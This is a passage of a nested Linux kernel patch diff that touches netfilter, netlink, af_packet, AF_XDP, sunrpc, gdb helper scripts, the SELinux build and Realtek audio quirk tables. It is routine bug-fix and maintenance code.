++	ct->status |= IPS_CONFIRMED;
++
++	timeout = (u64)ntohl(nla_get_be32(cda[CTA_TIMEOUT])) * HZ;
++	__nf_ct_set_timeout(ct, timeout);
++
+ 	if (cda[CTA_STATUS]) {
+ 		err = ctnetlink_change_status(ct, cda);
+ 		if (err < 0)
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index ce8a047ef8306..96bc4b8ded423 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -4984,12 +4984,24 @@ static void nf_tables_unbind_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 	}
+ }
+ 
++void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set)
++{
++	if (nft_set_is_anonymous(set))
++		nft_clear(ctx->net, set);
++
++	set->use++;
++}
++EXPORT_SYMBOL_GPL(nf_tables_activate_set);
++
+ void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 			      struct nft_set_binding *binding,
+ 			      enum nft_trans_phase phase)
+ {
+ 	switch (phase) {
+ 	case NFT_TRANS_PREPARE:
++		if (nft_set_is_anonymous(set))
++			nft_deactivate_next(ctx->net, set);
++
+ 		set->use--;
+ 		return;
+ 	case NFT_TRANS_ABORT:
+@@ -8571,6 +8583,8 @@ static int nf_tables_validate(struct net *net)
+ 			if (nft_table_validate(net, table) < 0)
+ 				return -EAGAIN;
+ 		}
++
++		nft_validate_state_update(net, NFT_VALIDATE_SKIP);
+ 		break;
+ 	}
+ 
+@@ -9491,11 +9505,6 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 	return 0;
+ }
+ 
+-static void nf_tables_cleanup(struct net *net)
+-{
+-	nft_validate_state_update(net, NFT_VALIDATE_SKIP);
+-}
+-
+ static int nf_tables_abort(struct net *net, struct sk_buff *skb,
+ 			   enum nfnl_abort_action action)
+ {
+@@ -9529,7 +9538,6 @@ static const struct nfnetlink_subsystem nf_tables_subsys = {
+ 	.cb		= nf_tables_cb,
+ 	.commit		= nf_tables_commit,
+ 	.abort		= nf_tables_abort,
+-	.cleanup	= nf_tables_cleanup,
+ 	.valid_genid	= nf_tables_valid_genid,
+ 	.owner		= THIS_MODULE,
+ };
+diff --git a/net/netfilter/nfnetlink.c b/net/netfilter/nfnetlink.c
+index 81c7737c803a6..ae7146475d17a 100644
+--- a/net/netfilter/nfnetlink.c
++++ b/net/netfilter/nfnetlink.c
+@@ -590,8 +590,6 @@ done:
+ 			goto replay_abort;
+ 		}
+ 	}
+-	if (ss->cleanup)
+-		ss->cleanup(net);
+ 
+ 	nfnl_err_deliver(&err_list, oskb);
+ 	kfree_skb(skb);
+diff --git a/net/netfilter/nft_dynset.c b/net/netfilter/nft_dynset.c
+index 274579b1696e0..bd19c7aec92ee 100644
+--- a/net/netfilter/nft_dynset.c
++++ b/net/netfilter/nft_dynset.c
+@@ -342,7 +342,7 @@ static void nft_dynset_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_dynset *priv = nft_expr_priv(expr);
+ 
+-	priv->set->use++;
++	nf_tables_activate_set(ctx, priv->set);
+ }
+ 
+ static void nft_dynset_destroy(const struct nft_ctx *ctx,
+diff --git a/net/netfilter/nft_lookup.c b/net/netfilter/nft_lookup.c
+index cecf8ab90e58f..03ef4fdaa460b 100644
+--- a/net/netfilter/nft_lookup.c
++++ b/net/netfilter/nft_lookup.c
+@@ -167,7 +167,7 @@ static void nft_lookup_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_lookup *priv = nft_expr_priv(expr);
+ 
+-	priv->set->use++;
++	nf_tables_activate_set(ctx, priv->set);
+ }
+ 
+ static void nft_lookup_destroy(const struct nft_ctx *ctx,
+diff --git a/net/netfilter/nft_objref.c b/net/netfilter/nft_objref.c
+index 7b01aa2ef6531..d985d361ed8ad 100644
+--- a/net/netfilter/nft_objref.c
++++ b/net/netfilter/nft_objref.c
+@@ -185,7 +185,7 @@ static void nft_objref_map_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_objref_map *priv = nft_expr_priv(expr);
+ 
+-	priv->set->use++;
++	nf_tables_activate_set(ctx, priv->set);
+ }
+ 
+ static void nft_objref_map_destroy(const struct nft_ctx *ctx,
+diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
+index f365dfdd672d7..9b6eb28e6e94f 100644
+--- a/net/netlink/af_netlink.c
++++ b/net/netlink/af_netlink.c
+@@ -1742,7 +1742,8 @@ static int netlink_getsockopt(struct socket *sock, int level, int optname,
+ {
+ 	struct sock *sk = sock->sk;
+ 	struct netlink_sock *nlk = nlk_sk(sk);
+-	int len, val, err;
++	unsigned int flag;
++	int len, val;
+ 
+ 	if (level != SOL_NETLINK)
+ 		return -ENOPROTOOPT;
+@@ -1754,39 +1755,17 @@ static int netlink_getsockopt(struct socket *sock, int level, int optname,
+ 
+ 	switch (optname) {
+ 	case NETLINK_PKTINFO:
+-		if (len < sizeof(int))
+-			return -EINVAL;
+-		len = sizeof(int);
+-		val = nlk->flags & NETLINK_F_RECV_PKTINFO ? 1 : 0;
+-		if (put_user(len, optlen) ||
+-		    put_user(val, optval))
+-			return -EFAULT;
+-		err = 0;
++		flag = NETLINK_F_RECV_PKTINFO;
+ 		break;
+ 	case NETLINK_BROADCAST_ERROR:
+-		if (len < sizeof(int))
+-			return -EINVAL;
+-		len = sizeof(int);
+-		val = nlk->flags & NETLINK_F_BROADCAST_SEND_ERROR ? 1 : 0;
+-		if (put_user(len, optlen) ||
+-		    put_user(val, optval))
+-			return -EFAULT;
+-		err = 0;
++		flag = NETLINK_F_BROADCAST_SEND_ERROR;
+ 		break;
+ 	case NETLINK_NO_ENOBUFS:
+-		if (len < sizeof(int))
+-			return -EINVAL;
+-		len = sizeof(int);
+-		val = nlk->flags & NETLINK_F_RECV_NO_ENOBUFS ? 1 : 0;
+-		if (put_user(len, optlen) ||
+-		    put_user(val, optval))
+-			return -EFAULT;
+-		err = 0;
++		flag = NETLINK_F_RECV_NO_ENOBUFS;
+ 		break;
+ 	case NETLINK_LIST_MEMBERSHIPS: {
+-		int pos, idx, shift;
++		int pos, idx, shift, err = 0;
+ 
+-		err = 0;
+ 		netlink_lock_table();
+ 		for (pos = 0; pos * 8 < nlk->ngroups; pos += sizeof(u32)) {
+ 			if (len - pos < sizeof(u32))
+@@ -1803,40 +1782,32 @@ static int netlink_getsockopt(struct socket *sock, int level, int optname,
+ 		if (put_user(ALIGN(nlk->ngroups / 8, sizeof(u32)), optlen))
+ 			err = -EFAULT;
+ 		netlink_unlock_table();
+-		break;
++		return err;
+ 	}
+ 	case NETLINK_CAP_ACK:
+-		if (len < sizeof(int))
+-			return -EINVAL;
+-		len = sizeof(int);
+-		val = nlk->flags & NETLINK_F_CAP_ACK ? 1 : 0;
+-		if (put_user(len, optlen) ||
+-		    put_user(val, optval))
+-			return -EFAULT;
+-		err = 0;
++		flag = NETLINK_F_CAP_ACK;
+ 		break;
+ 	case NETLINK_EXT_ACK:
+-		if (len < sizeof(int))
+-			return -EINVAL;
+-		len = sizeof(int);
+-		val = nlk->flags & NETLINK_F_EXT_ACK ? 1 : 0;
+-		if (put_user(len, optlen) || put_user(val, optval))
+-			return -EFAULT;
+-		err = 0;
++		flag = NETLINK_F_EXT_ACK;
+ 		break;
+ 	case NETLINK_GET_STRICT_CHK:
+-		if (len < sizeof(int))
+-			return -EINVAL;
+-		len = sizeof(int);
+-		val = nlk->flags & NETLINK_F_STRICT_CHK ? 1 : 0;
+-		if (put_user(len, optlen) || put_user(val, optval))
+-			return -EFAULT;
+-		err = 0;
++		flag = NETLINK_F_STRICT_CHK;
+ 		break;
+ 	default:
+-		err = -ENOPROTOOPT;
++		return -ENOPROTOOPT;
+ 	}
+-	return err;
++
++	if (len < sizeof(int))
++		return -EINVAL;
++
++	len = sizeof(int);
++	val = nlk->flags & flag ? 1 : 0;
++
++	if (put_user(len, optlen) ||
++	    copy_to_user(optval, &val, len))
++		return -EFAULT;
++
++	return 0;
+ }
+ 
+ static void netlink_cmsg_recv_pktinfo(struct msghdr *msg, struct sk_buff *skb)
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index b5ab98ca2511b..1259b34a28ebe 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -307,7 +307,8 @@ static void packet_cached_dev_reset(struct packet_sock *po)
+ 
+ static bool packet_use_direct_xmit(const struct packet_sock *po)
+ {
+-	return po->xmit == packet_direct_xmit;
++	/* Paired with WRITE_ONCE() in packet_setsockopt() */
++	return READ_ONCE(po->xmit) == packet_direct_xmit;
+ }
+ 
+ static u16 packet_pick_tx_queue(struct sk_buff *skb)
+@@ -2185,7 +2186,7 @@ static int packet_rcv(struct sk_buff *skb, struct net_device *dev,
+ 	sll = &PACKET_SKB_CB(skb)->sa.ll;
+ 	sll->sll_hatype = dev->type;
+ 	sll->sll_pkttype = skb->pkt_type;
+-	if (unlikely(po->origdev))
++	if (unlikely(packet_sock_flag(po, PACKET_SOCK_ORIGDEV)))
+ 		sll->sll_ifindex = orig_dev->ifindex;
+ 	else
+ 		sll->sll_ifindex = dev->ifindex;
+@@ -2460,7 +2461,7 @@ static int tpacket_rcv(struct sk_buff *skb, struct net_device *dev,
+ 	sll->sll_hatype = dev->type;
+ 	sll->sll_protocol = skb->protocol;
+ 	sll->sll_pkttype = skb->pkt_type;
+-	if (unlikely(po->origdev))
++	if (unlikely(packet_sock_flag(po, PACKET_SOCK_ORIGDEV)))
+ 		sll->sll_ifindex = orig_dev->ifindex;
+ 	else
+ 		sll->sll_ifindex = dev->ifindex;
+@@ -2867,7 +2868,8 @@ tpacket_error:
+ 		packet_inc_pending(&po->tx_ring);
+ 
+ 		status = TP_STATUS_SEND_REQUEST;
+-		err = po->xmit(skb);
++		/* Paired with WRITE_ONCE() in packet_setsockopt() */
++		err = READ_ONCE(po->xmit)(skb);
+ 		if (unlikely(err != 0)) {
+ 			if (err > 0)
+ 				err = net_xmit_errno(err);
+@@ -3070,7 +3072,8 @@ static int packet_snd(struct socket *sock, struct msghdr *msg, size_t len)
+ 		virtio_net_hdr_set_proto(skb, &vnet_hdr);
+ 	}
+ 
+-	err = po->xmit(skb);
++	/* Paired with WRITE_ONCE() in packet_setsockopt() */
++	err = READ_ONCE(po->xmit)(skb);
+ 	if (unlikely(err != 0)) {
+ 		if (err > 0)
+ 			err = net_xmit_errno(err);
+@@ -3513,7 +3516,7 @@ static int packet_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 		memcpy(msg->msg_name, &PACKET_SKB_CB(skb)->sa, copy_len);
+ 	}
+ 
+-	if (pkt_sk(sk)->auxdata) {
++	if (packet_sock_flag(pkt_sk(sk), PACKET_SOCK_AUXDATA)) {
+ 		struct tpacket_auxdata aux;
+ 
+ 		aux.tp_status = TP_STATUS_USER;
+@@ -3897,9 +3900,7 @@ packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
+ 		if (copy_from_sockptr(&val, optval, sizeof(val)))
+ 			return -EFAULT;
+ 
+-		lock_sock(sk);
+-		po->auxdata = !!val;
+-		release_sock(sk);
++		packet_sock_flag_set(po, PACKET_SOCK_AUXDATA, val);
+ 		return 0;
+ 	}
+ 	case PACKET_ORIGDEV:
+@@ -3911,9 +3912,7 @@ packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
+ 		if (copy_from_sockptr(&val, optval, sizeof(val)))
+ 			return -EFAULT;
+ 
+-		lock_sock(sk);
+-		po->origdev = !!val;
+-		release_sock(sk);
++		packet_sock_flag_set(po, PACKET_SOCK_ORIGDEV, val);
+ 		return 0;
+ 	}
+ 	case PACKET_VNET_HDR:
+@@ -4007,7 +4006,8 @@ packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
+ 		if (copy_from_sockptr(&val, optval, sizeof(val)))
+ 			return -EFAULT;
+ 
+-		po->xmit = val ? packet_direct_xmit : dev_queue_xmit;
++		/* Paired with all lockless reads of po->xmit */
++		WRITE_ONCE(po->xmit, val ? packet_direct_xmit : dev_queue_xmit);
+ 		return 0;
+ 	}
+ 	default:
+@@ -4058,10 +4058,10 @@ static int packet_getsockopt(struct socket *sock, int level, int optname,
+ 
+ 		break;
+ 	case PACKET_AUXDATA:
+-		val = po->auxdata;
++		val = packet_sock_flag(po, PACKET_SOCK_AUXDATA);
+ 		break;
+ 	case PACKET_ORIGDEV:
+-		val = po->origdev;
++		val = packet_sock_flag(po, PACKET_SOCK_ORIGDEV);
+ 		break;
+ 	case PACKET_VNET_HDR:
+ 		val = po->has_vnet_hdr;
+diff --git a/net/packet/diag.c b/net/packet/diag.c
+index 07812ae5ca073..d704c7bf51b20 100644
+--- a/net/packet/diag.c
++++ b/net/packet/diag.c
+@@ -23,9 +23,9 @@ static int pdiag_put_info(const struct packet_sock *po, struct sk_buff *nlskb)
+ 	pinfo.pdi_flags = 0;
+ 	if (po->running)
+ 		pinfo.pdi_flags |= PDI_RUNNING;
+-	if (po->auxdata)
++	if (packet_sock_flag(po, PACKET_SOCK_AUXDATA))
+ 		pinfo.pdi_flags |= PDI_AUXDATA;
+-	if (po->origdev)
++	if (packet_sock_flag(po, PACKET_SOCK_ORIGDEV))
+ 		pinfo.pdi_flags |= PDI_ORIGDEV;
+ 	if (po->has_vnet_hdr)
+ 		pinfo.pdi_flags |= PDI_VNETHDR;
+diff --git a/net/packet/internal.h b/net/packet/internal.h
+index 48af35b1aed25..3bae8ea7a36f5 100644
+--- a/net/packet/internal.h
++++ b/net/packet/internal.h
+@@ -116,10 +116,9 @@ struct packet_sock {
+ 	int			copy_thresh;
+ 	spinlock_t		bind_lock;
+ 	struct mutex		pg_vec_lock;
++	unsigned long		flags;
+ 	unsigned int		running;	/* bind_lock must be held */
+-	unsigned int		auxdata:1,	/* writer must hold sock lock */
+-				origdev:1,
+-				has_vnet_hdr:1,
++	unsigned int		has_vnet_hdr:1, /* writer must hold sock lock */
+ 				tp_loss:1,
+ 				tp_tx_has_off:1;
+ 	int			pressure;
+@@ -144,4 +143,25 @@ static inline struct packet_sock *pkt_sk(struct sock *sk)
+ 	return (struct packet_sock *)sk;
+ }
+ 
++enum packet_sock_flags {
++	PACKET_SOCK_ORIGDEV,
++	PACKET_SOCK_AUXDATA,
++};
++
++static inline void packet_sock_flag_set(struct packet_sock *po,
++					enum packet_sock_flags flag,
++					bool val)
++{
++	if (val)
++		set_bit(flag, &po->flags);
++	else
++		clear_bit(flag, &po->flags);
++}
++
++static inline bool packet_sock_flag(const struct packet_sock *po,
++				    enum packet_sock_flags flag)
++{
++	return test_bit(flag, &po->flags);
++}
++
+ #endif
+diff --git a/net/rxrpc/key.c b/net/rxrpc/key.c
+index 8d53aded09c42..33e8302a79e33 100644
+--- a/net/rxrpc/key.c
++++ b/net/rxrpc/key.c
+@@ -680,7 +680,7 @@ static long rxrpc_read(const struct key *key,
+ 			return -ENOPKG;
+ 		}
+ 
+-		if (WARN_ON((unsigned long)xdr - (unsigned long)oldxdr ==
++		if (WARN_ON((unsigned long)xdr - (unsigned long)oldxdr !=
+ 			    toksize))
+ 			return -EIO;
+ 	}
+diff --git a/net/sched/sch_fq.c b/net/sched/sch_fq.c
+index 48d14fb90ba02..f59a2cb2c803d 100644
+--- a/net/sched/sch_fq.c
++++ b/net/sched/sch_fq.c
+@@ -779,13 +779,17 @@ static int fq_resize(struct Qdisc *sch, u32 log)
+ 	return 0;
+ }
+ 
++static struct netlink_range_validation iq_range = {
++	.max = INT_MAX,
++};
++
+ static const struct nla_policy fq_policy[TCA_FQ_MAX + 1] = {
+ 	[TCA_FQ_UNSPEC]			= { .strict_start_type = TCA_FQ_TIMER_SLACK },
+ 
+ 	[TCA_FQ_PLIMIT]			= { .type = NLA_U32 },
+ 	[TCA_FQ_FLOW_PLIMIT]		= { .type = NLA_U32 },
+ 	[TCA_FQ_QUANTUM]		= { .type = NLA_U32 },
+-	[TCA_FQ_INITIAL_QUANTUM]	= { .type = NLA_U32 },
++	[TCA_FQ_INITIAL_QUANTUM]	= NLA_POLICY_FULL_RANGE(NLA_U32, &iq_range),
+ 	[TCA_FQ_RATE_ENABLE]		= { .type = NLA_U32 },
+ 	[TCA_FQ_FLOW_DEFAULT_RATE]	= { .type = NLA_U32 },
+ 	[TCA_FQ_FLOW_MAX_RATE]		= { .type = NLA_U32 },
+diff --git a/net/sunrpc/clnt.c b/net/sunrpc/clnt.c
+index fd7e1c630493e..d2ee566343083 100644
+--- a/net/sunrpc/clnt.c
++++ b/net/sunrpc/clnt.c
+@@ -2050,9 +2050,6 @@ call_bind_status(struct rpc_task *task)
+ 			status = -EOPNOTSUPP;
+ 			break;
+ 		}
+-		if (task->tk_rebind_retry == 0)
+-			break;
+-		task->tk_rebind_retry--;
+ 		rpc_delay(task, 3*HZ);
+ 		goto retry_timeout;
+ 	case -ENOBUFS:
+diff --git a/net/sunrpc/sched.c b/net/sunrpc/sched.c
+index be587a308e05a..c8321de341eea 100644
+--- a/net/sunrpc/sched.c
++++ b/net/sunrpc/sched.c
+@@ -817,7 +817,6 @@ rpc_init_task_statistics(struct rpc_task *task)
+ 	/* Initialize retry counters */
+ 	task->tk_garb_retry = 2;
+ 	task->tk_cred_retry = 2;
+-	task->tk_rebind_retry = 2;
+ 
+ 	/* starting timestamp */
+ 	task->tk_start = ktime_get();
+diff --git a/net/xdp/xsk_queue.h b/net/xdp/xsk_queue.h
+index c6fb6b7636582..bdeba20aaf8ff 100644
+--- a/net/xdp/xsk_queue.h
++++ b/net/xdp/xsk_queue.h
+@@ -161,6 +161,7 @@ static inline bool xp_unaligned_validate_desc(struct xsk_buff_pool *pool,
+ 		return false;
+ 
+ 	if (base_addr >= pool->addrs_cnt || addr >= pool->addrs_cnt ||
++	    addr + desc->len > pool->addrs_cnt ||
+ 	    xp_desc_crosses_non_contig_pg(pool, addr, desc->len))
+ 		return false;
+ 
+diff --git a/net/xdp/xskmap.c b/net/xdp/xskmap.c
+index 771d0fa90ef58..3436a8efb8dc7 100644
+--- a/net/xdp/xskmap.c
++++ b/net/xdp/xskmap.c
+@@ -150,8 +150,8 @@ static void *xsk_map_lookup_elem_sys_only(struct bpf_map *map, void *key)
+ 	return ERR_PTR(-EOPNOTSUPP);
+ }
+ 
+-static int xsk_map_update_elem(struct bpf_map *map, void *key, void *value,
+-			       u64 map_flags)
++static long xsk_map_update_elem(struct bpf_map *map, void *key, void *value,
++				u64 map_flags)
+ {
+ 	struct xsk_map *m = container_of(map, struct xsk_map, map);
+ 	struct xdp_sock __rcu **map_entry;
+@@ -211,7 +211,7 @@ out:
+ 	return err;
+ }
+ 
+-static int xsk_map_delete_elem(struct bpf_map *map, void *key)
++static long xsk_map_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct xsk_map *m = container_of(map, struct xsk_map, map);
+ 	struct xdp_sock __rcu **map_entry;
+@@ -231,7 +231,7 @@ static int xsk_map_delete_elem(struct bpf_map *map, void *key)
+ 	return 0;
+ }
+ 
+-static int xsk_map_redirect(struct bpf_map *map, u64 index, u64 flags)
++static long xsk_map_redirect(struct bpf_map *map, u64 index, u64 flags)
+ {
+ 	return __bpf_xdp_redirect_map(map, index, flags, 0,
+ 				      __xsk_map_lookup_elem);
+diff --git a/scripts/gdb/linux/clk.py b/scripts/gdb/linux/clk.py
+index 061aecfa294e6..7a01fdc3e8446 100644
+--- a/scripts/gdb/linux/clk.py
++++ b/scripts/gdb/linux/clk.py
+@@ -41,6 +41,8 @@ are cached and potentially out of date"""
+             self.show_subtree(child, level + 1)
+ 
+     def invoke(self, arg, from_tty):
++        if utils.gdb_eval_or_none("clk_root_list") is None:
++            raise gdb.GdbError("No clocks registered")
+         gdb.write("                                 enable  prepare  protect               \n")
+         gdb.write("   clock                          count    count    count        rate   \n")
+         gdb.write("------------------------------------------------------------------------\n")
+diff --git a/scripts/gdb/linux/constants.py.in b/scripts/gdb/linux/constants.py.in
+index 2efbec6b6b8db..08f0587d15ea1 100644
+--- a/scripts/gdb/linux/constants.py.in
++++ b/scripts/gdb/linux/constants.py.in
+@@ -39,6 +39,8 @@
+ 
+ import gdb
+ 
++LX_CONFIG(CONFIG_DEBUG_INFO_REDUCED)
++
+ /* linux/clk-provider.h */
+ if IS_BUILTIN(CONFIG_COMMON_CLK):
+     LX_GDBPARSED(CLK_GET_RATE_NOCACHE)
+diff --git a/scripts/gdb/linux/genpd.py b/scripts/gdb/linux/genpd.py
+index 39cd1abd85590..b53649c0a77a6 100644
+--- a/scripts/gdb/linux/genpd.py
++++ b/scripts/gdb/linux/genpd.py
+@@ -5,7 +5,7 @@
+ import gdb
+ import sys
+ 
+-from linux.utils import CachedType
++from linux.utils import CachedType, gdb_eval_or_none
+ from linux.lists import list_for_each_entry
+ 
+ generic_pm_domain_type = CachedType('struct generic_pm_domain')
+@@ -70,6 +70,8 @@ Output is similar to /sys/kernel/debug/pm_genpd/pm_genpd_summary'''
+             gdb.write('    %-50s  %s\n' % (kobj_path, rtpm_status_str(dev)))
+ 
+     def invoke(self, arg, from_tty):
++        if gdb_eval_or_none("&gpd_list") is None:
++            raise gdb.GdbError("No power domain(s) registered")
+         gdb.write('domain                          status          children\n');
+         gdb.write('    /device                                             runtime status\n');
+         gdb.write('----------------------------------------------------------------------\n');
+diff --git a/scripts/gdb/linux/timerlist.py b/scripts/gdb/linux/timerlist.py
+index 071d0dd5a6349..51def847f1ef9 100644
+--- a/scripts/gdb/linux/timerlist.py
++++ b/scripts/gdb/linux/timerlist.py
+@@ -73,7 +73,7 @@ def print_cpu(hrtimer_bases, cpu, max_clock_bases):
+     ts = cpus.per_cpu(tick_sched_ptr, cpu)
+ 
+     text = "cpu: {}\n".format(cpu)
+-    for i in xrange(max_clock_bases):
++    for i in range(max_clock_bases):
+         text += " clock {}:\n".format(i)
+         text += print_base(cpu_base['clock_base'][i])
+ 
+@@ -158,6 +158,8 @@ def pr_cpumask(mask):
+     num_bytes = (nr_cpu_ids + 7) / 8
+     buf = utils.read_memoryview(inf, bits, num_bytes).tobytes()
+     buf = binascii.b2a_hex(buf)
++    if type(buf) is not str:
++        buf = buf.decode()
+ 
+     chunks = []
+     i = num_bytes
+diff --git a/scripts/gdb/linux/utils.py b/scripts/gdb/linux/utils.py
+index 1553f68716cc2..7f36aee32ac66 100644
+--- a/scripts/gdb/linux/utils.py
++++ b/scripts/gdb/linux/utils.py
+@@ -88,7 +88,10 @@ def get_target_endianness():
+ 
+ 
+ def read_memoryview(inf, start, length):
+-    return memoryview(inf.read_memory(start, length))
++    m = inf.read_memory(start, length)
++    if type(m) is memoryview:
++        return m
++    return memoryview(m)
+ 
+ 
+ def read_u16(buffer, offset):
+diff --git a/scripts/gdb/vmlinux-gdb.py b/scripts/gdb/vmlinux-gdb.py
+index 3e8d3669f0ce0..5564ffe8ae327 100644
+--- a/scripts/gdb/vmlinux-gdb.py
++++ b/scripts/gdb/vmlinux-gdb.py
+@@ -22,6 +22,10 @@ except:
+     gdb.write("NOTE: gdb 7.2 or later required for Linux helper scripts to "
+               "work.\n")
+ else:
++    import linux.constants
++    if linux.constants.LX_CONFIG_DEBUG_INFO_REDUCED:
++        raise gdb.GdbError("Reduced debug information will prevent GDB "
++                           "from having complete types.\n")
+     import linux.utils
+     import linux.symbols
+     import linux.modules
+@@ -32,7 +36,6 @@ else:
+     import linux.lists
+     import linux.rbtree
+     import linux.proc
+-    import linux.constants
+     import linux.timerlist
+     import linux.clk
+     import linux.genpd
+diff --git a/security/integrity/ima/Kconfig b/security/integrity/ima/Kconfig
+index 39caeca474449..60a511c6b583e 100644
+--- a/security/integrity/ima/Kconfig
++++ b/security/integrity/ima/Kconfig
+@@ -8,7 +8,7 @@ config IMA
+ 	select CRYPTO_HMAC
+ 	select CRYPTO_SHA1
+ 	select CRYPTO_HASH_INFO
+-	select TCG_TPM if HAS_IOMEM && !UML
++	select TCG_TPM if HAS_IOMEM
+ 	select TCG_TIS if TCG_TPM && X86
+ 	select TCG_CRB if TCG_TPM && ACPI
+ 	select TCG_IBMVTPM if TCG_TPM && PPC_PSERIES
+diff --git a/security/selinux/Makefile b/security/selinux/Makefile
+index 7761624448826..0aecf9334ec31 100644
+--- a/security/selinux/Makefile
++++ b/security/selinux/Makefile
+@@ -23,8 +23,8 @@ ccflags-y := -I$(srctree)/security/selinux -I$(srctree)/security/selinux/include
+ $(addprefix $(obj)/,$(selinux-y)): $(obj)/flask.h
+ 
+ quiet_cmd_flask = GEN     $(obj)/flask.h $(obj)/av_permissions.h
+-      cmd_flask = scripts/selinux/genheaders/genheaders $(obj)/flask.h $(obj)/av_permissions.h
++      cmd_flask = $< $(obj)/flask.h $(obj)/av_permissions.h
+ 
+ targets += flask.h av_permissions.h
+-$(obj)/flask.h: $(src)/include/classmap.h FORCE
++$(obj)/flask.h $(obj)/av_permissions.h &: scripts/selinux/genheaders/genheaders FORCE
+ 	$(call if_changed,flask)
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index f70d6a33421d2..172ffc2c332b7 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9428,6 +9428,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8898, "HP EliteBook 845 G8 Notebook PC", ALC285_FIXUP_HP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x103c, 0x88d0, "HP Pavilion 15-eh1xxx (mainboard 88D0)", ALC287_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8902, "HP OMEN 16", ALC285_FIXUP_HP_MUTE_LED),
++	SND_PCI_QUIRK(0x103c, 0x8919, "HP Pavilion Aero Laptop 13-be0xxx", ALC287_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x896d, "HP ZBook Firefly 16 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x896e, "HP EliteBook x360 830 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8971, "HP EliteBook 830 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+@@ -9478,6 +9479,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b8d, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b8f, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b92, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b96, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8bf0, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x1043, 0x103e, "ASUS X540SA", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x103f, "ASUS TX300", ALC282_FIXUP_ASUS_TX300),
+@@ -9500,6 +9502,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1427, "Asus Zenbook UX31E", ALC269VB_FIXUP_ASUS_ZENBOOK),
+ 	SND_PCI_QUIRK(0x1043, 0x1517, "Asus Zenbook UX31A", ALC269VB_FIXUP_ASUS_ZENBOOK_UX31A),
+ 	SND_PCI_QUIRK(0x1043, 0x1662, "ASUS GV301QH", ALC294_FIXUP_ASUS_DUAL_SPK),
++	SND_PCI_QUIRK(0x1043, 0x1683, "ASUS UM3402YAR", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x16b2, "ASUS GU603", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x16e3, "ASUS UX50", ALC269_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1740, "ASUS UX430UA", ALC295_FIXUP_ASUS_DACS),
+@@ -9689,6 +9692,8 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x22f1, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x22f2, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x22f3, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x17aa, 0x2316, "Thinkpad P1 Gen 6", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x17aa, 0x2317, "Thinkpad P1 Gen 6", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x2318, "Thinkpad Z13 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x2319, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x231a, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
+diff --git a/sound/soc/amd/ps/pci-ps.c b/sound/soc/amd/ps/pci-ps.c
+index 489f01a206999..0e029aceb6d65 100644
+--- a/sound/soc/amd/ps/pci-ps.c
++++ b/sound/soc/amd/ps/pci-ps.c
+@@ -91,7 +91,6 @@ static int acp63_init(void __iomem *acp_base, struct device *dev)
